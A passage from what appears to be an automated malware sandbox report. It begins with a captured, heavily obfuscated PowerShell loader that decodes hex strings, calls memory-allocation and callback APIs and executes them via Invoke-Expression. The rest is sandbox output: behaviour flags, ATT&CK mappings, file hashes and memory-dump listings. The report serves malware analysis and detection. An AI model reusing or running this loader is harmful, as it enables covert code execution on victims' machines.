'73575D4C514D51584A106957500D0C106B504D5F585B705F4A57485B735B4A56515A4D';$Rekylen2=Harlekinernes0 '795B4A6E4C515D7F5A5A4C5B4D4D';$Rekylen3=Harlekinernes0 '6D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10765F505A525B6C5B58';$Rekylen4=Harlekinernes0 '4D4A4C575059';$Rekylen5=Harlekinernes0 '795B4A73515A4B525B765F505A525B';$Rekylen6=Harlekinernes0 '6C6A6D4E5B5D575F52705F535B121E76575A5B7C476D5759121E6E4B5C52575D';$Rekylen7=Harlekinernes0 '6C4B504A57535B121E735F505F595B5A';$Rekylen8=Harlekinernes0 '6C5B58525B5D4A5B5A7A5B525B595F4A5B';$Rekylen9=Harlekinernes0 '7750735B53514C4773515A4B525B';$Vvers0=Harlekinernes0 '73477A5B525B595F4A5B6A474E5B';$Vvers1=Harlekinernes0 '7D525F4D4D121E6E4B5C52575D121E6D5B5F525B5A121E7F504D577D525F4D4D121E7F4B4A517D525F4D4D';$Vvers2=Harlekinernes0 '77504851555B';$Vvers3=Harlekinernes0 '6E4B5C52575D121E76575A5B7C476D5759121E705B496D52514A121E68574C4A4B5F52';$Vvers4=Harlekinernes0 '68574C4A4B5F527F5252515D';$Vvers5=Harlekinernes0 '504A5A5252';$Vvers6=Harlekinernes0 '704A6E4C514A5B5D4A68574C4A4B5F52735B53514C47';$Vvers7=Harlekinernes0 '777B66';$Vvers8=Harlekinernes0 '62';$Afgrderne=Harlekinernes0 '6B6D7B6C0D0C';$Dommerkomites=Harlekinernes0 '7D5F52526957505A51496E4C515D7F';function fkp {Param ($Orbitolites, $Sonantizeds) ;$Nonfloriferous0 =Harlekinernes0 '1A77534E5750595B535B504A1E031E16657F4E4E7A51535F57506304047D4B4C4C5B504A7A51535F575010795B4A7F4D4D5B535C52575B4D16171E421E69565B4C5B13715C545B5D4A1E451E1A61107952515C5F527F4D4D5B535C52477D5F5D565B1E137F505A1E1A611072515D5F4A575150106D4E52574A161A68485B4C4D061765130F63107B4F4B5F524D161A6C5B5547525B500E171E431710795B4A6A474E5B161A6C5B5547525B500F17';&($Vvers7) $Nonfloriferous0;$Nonfloriferous5 = Harlekinernes0 '1A7B504D4E505A5B4C485159505B1E031E1A77534E5750595B535B504A10795B4A735B4A56515A161A6C5B5547525B500C121E656A474E5B6563631E7E161A6C5B5547525B500D121E1A6C5B5547525B500A1717';&($Vvers7) $Nonfloriferous5;$Nonfloriferous1 = Harlekinernes0 '4C5B4A4B4C501E1A7B504D4E505A5B4C485159505B1077504851555B161A504B5252121E7E16656D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10765F505A525B6C5B586316705B4913715C545B5D4A1E6D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10765F505A525B6C5B581616705B4913715C545B5D4A1E77504A6E4A4C17121E161A77534E5750595B535B504A10795B4A735B4A56515A161A6C5B5547525B500B17171077504851555B161A504B5252121E7E161A714C5C574A5152574A5B4D17171717121E1A6D51505F504A57445B5A4D1717';&($Vvers7) $Nonfloriferous1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Dellsningen,[Parameter(Position = 1)] [Type] $Solventers = [Void]);$Nonfloriferous2 = Harlekinernes0 '1A735F594A4D4E4C51595B4A1E031E657F4E4E7A51535F57506304047D4B4C4C5B504A7A51535F5750107A5B5857505B7A47505F53575D7F4D4D5B535C52471616705B4913715C545B5D4A1E6D474D4A5B53106C5B58525B5D4A575150107F4D4D5B535C5247705F535B161A6C5B5547525B50061717121E656D474D4A5B53106C5B58525B5D4A575150107B53574A107F4D4D5B535C52477C4B57525A5B4C7F5D5D5B4D4D6304046C4B5017107A5B5857505B7A47505F53575D73515A4B525B161A6C5B5547525B5007121E1A585F524D5B17107A5B5857505B6A474E5B161A68485B4C4D0E121E1A68485B4C4D0F121E656D474D4A5B5310734B524A575D5F4D4A7A5B525B595F4A5B6317';&($Vvers7) $Nonfloriferous2;$Nonfloriferous3 = Harlekinernes0 '1A735F594A4D4E4C51595B4A107A5B5857505B7D51504D4A4C4B5D4A514C161A6C5B5547525B5008121E656D474D4A5B53106C5B58525B5D4A575150107D5F52525750597D5150485B504A5751504D6304046D4A5F505A5F4C5A121E1A7A5B52524D505750595B5017106D5B4A77534E525B535B504A5F4A57515078525F594D161A6C5B5547525B500917';&($Vvers7) $Nonfloriferous3;$Nonfloriferous4 = Harlekinernes0 '1A735F594A4D4E4C51595B4A107A5B5857505B735B4A56515A161A68485B4C4D0C121E1A68485B4C4D0D121E1A6D5152485B504A5B4C4D121E1A7A5B52524D505750595B5017106D5B4A77534E525B535B504A5F4A57515078525F594D161A6C5B5547525B500917';&($Vvers7) $Nonfloriferous4;$Nonfloriferous5 = Harlekinernes0 '4C5B4A4B4C501E1A735F594A4D4E4C51595B4A107D4C5B5F4A5B6A474E5B1617';&($Vvers7) $Nonfloriferous5 ;}$Rettersted = Harlekinernes0 '555B4C505B520D0C';$Nonfloriferous6 = Harlekinernes0 '1A7557505A4C5B5A4D56574E1E031E656D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10735F4C4D565F52630404795B4A7A5B525B595F4A5B78514C784B505D4A5751506E5157504A5B4C161658554E1E1A6C5B4A4A5B4C4D4A5B5A1E1A68485B4C4D0A17121E16797A6A1E7E166577504A6E4A4C63121E656B77504A0D0C63121E656B77504A0D0C63121E656B77504A0D0C63171E166577504A6E4A4C63171717';&($Vvers7) $Nonfloriferous6;$Bibliopegy = fkp $Vvers5 $Vvers6;$Nonfloriferous7 = Harlekinernes0 '1A7B4A5647520D1E031E1A7557505A4C5B5A4D56574E1077504851555B166577504A6E4A4C630404645B4C51121E080A0F121E0E460D0E0E0E121E0E460A0E17';&($Vvers7) $Nonfloriferous7;$Nonfloriferous8 = Harlekinernes0 '1A7D5651494A57535B1E031E1A7557505A4C5B5A4D56574E1077504851555B166577504A6E4A4C630404645B4C51121E0C090A0D0B0E0E06121E0E460D0E0E0E121E0E460A17';&($Vvers7) $Nonfloriferous8;$Ethyl00='HKCU:\Corseleting\Formnd';$Ethyl01 =Harlekinernes0 '1A6B505A5B4A5B4C5357505B5A505B4D4D0316795B4A13774A5B536E4C514E5B4C4A471E136E5F4A561E1A7B4A5647520E0E17106A4B5057555F5B4C';&($Vvers7) $Ethyl01;$Nonfloriferous9 = Harlekinernes0 '1A7051505852514C57585B4C514B4D1E031E656D474D4A5B53107D5150485B4C4A630404784C51537C5F4D5B080A6D4A4C575059161A6B505A5B4A5B4C5357505B5A505B4D4D17';&($Vvers7) $Nonfloriferous9;$Undeterminedness0 = Harlekinernes0 '656D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10735F4C4D565F526304047D514E47161A7051505852514C57585B4C514B4D121E0E121E1E1A7B4A5647520D121E080A0F17';&($Vvers7) $Undeterminedness0;$Prepg=$Nonfloriferous.count-641;$Undeterminedness1 = Harlekinernes0 '656D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10735F4C4D565F526304047D514E47161A7051505852514C57585B4C514B4D121E080A0F121E1A7D5651494A57535B121E1A6E4C5B4E5917';&($Vvers7) $Undeterminedness1;$Undeterminedness2 = Harlekinernes0 '1A78575C4C515D5651505A4C514D4A5B5F520C0E0D1E031E656D474D4A5B53106C4B504A57535B1077504A5B4C514E6D5B4C48575D5B4D10735F4C4D565F52630404795B4A7A5B525B595F4A5B78514C784B505D4A5751506E5157504A5B4C161658554E1E1A7F58594C5A5B4C505B1E1A7A5153535B4C555153574A5B4D17121E16797A6A1E7E166577504A6E4A4C63121E6577504A6E4A4C63121E6577504A6E4A4C63121E6577504A6E4A4C63121E6577504A6E4A4C63171E166577504A6E4A4C63171717';&($Vvers7) $Undeterminedness2;$Undeterminedness3 = Harlekinernes0 '1A78575C4C515D5651505A4C514D4A5B5F520C0E0D1077504851555B161A7B4A5647520D121A7D5651494A57535B121A7C575C5257514E5B5947120E120E17';&($Vvers7) $Undeterminedness3#"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lujgnynd.0ir.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2056-166-0x0000000006820000-0x000000000683E000-memory.dmp

Filesize
120KB

Download
memory/2056-171-0x000000000A240000-0x000000000A7E4000-memory.dmp

Filesize
5.6MB

Download
memory/2056-156-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/2056-177-0x0000000002F90000-0x0000000002FA0000-memory.dmp

Filesize
64KB

Download
memory/2056-150-0x0000000002F20000-0x0000000002F56000-memory.dmp

Filesize
216KB

Download
memory/2056-151-0x0000000005A40000-0x0000000006068000-memory.dmp

Filesize
6.2MB

Download
memory/2056-152-0x0000000005950000-0x0000000005972000-memory.dmp

Filesize
136KB

Download
memory/2056-153-0x0000000002F90000-0x0000000002FA0000-memory.dmp

Filesize
64KB

Download
memory/2056-154-0x0000000002F90000-0x0000000002FA0000-memory.dmp

Filesize
64KB

Download
memory/2056-155-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/2056-178-0x0000000002F90000-0x0000000002FA0000-memory.dmp

Filesize
64KB

Download
memory/2056-172-0x0000000008810000-0x000000000A23A000-memory.dmp

Filesize
26.2MB

Download
memory/2056-169-0x0000000007B10000-0x0000000007BA6000-memory.dmp

Filesize
600KB

Download
memory/2056-168-0x0000000006D60000-0x0000000006D7A000-memory.dmp

Filesize
104KB

Download
memory/2056-167-0x0000000008190000-0x000000000880A000-memory.dmp

Filesize
6.5MB

Download
memory/2056-170-0x0000000007A40000-0x0000000007A62000-memory.dmp

Filesize
136KB

Download
memory/2056-173-0x0000000006E20000-0x0000000006E21000-memory.dmp

Filesize
4KB

Download
memory/4044-147-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download
memory/4044-175-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download
memory/4044-174-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download
memory/4044-176-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download
memory/4044-143-0x000001B236280000-0x000001B2362A2000-memory.dmp

Filesize
136KB

Download
memory/4044-149-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download
memory/4044-148-0x000001B24E780000-0x000001B24E790000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing